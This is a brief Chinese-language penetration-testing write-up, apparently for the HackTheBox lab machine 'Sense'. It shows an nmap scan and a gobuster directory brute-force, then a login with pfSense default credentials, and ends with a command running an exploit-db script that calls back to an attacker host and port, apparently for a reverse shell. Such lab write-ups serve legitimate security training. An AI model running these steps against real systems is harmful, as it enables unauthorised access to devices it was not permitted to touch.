0x00 信息收集
nmap -Pn -sV -T 4 10.10.10.60
查看80和443端口的服务
尝试常用弱口令登录以及lighttpd版本的漏洞失败,使用gobuster爆破路径
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -l -t 100 -k -u https://10.10.10.60 //-l 显示相应长度;-k 跳过ssl证书验证;
得到路径/system-users.txt,得到账号名为rohit
使用google搜索sense default crendital,会默认关联pfsense default crendital。得到默认账号admin,默认密码pfsense
成功进入后台,得到当前软件使用的版本为
在exploitdb中找到相关漏洞
0x01 漏洞利用
python3 exp.py --rhost 10.10.10.60 --lhost 10.10.14.3 --lport 4444 --username rohit --password pfsense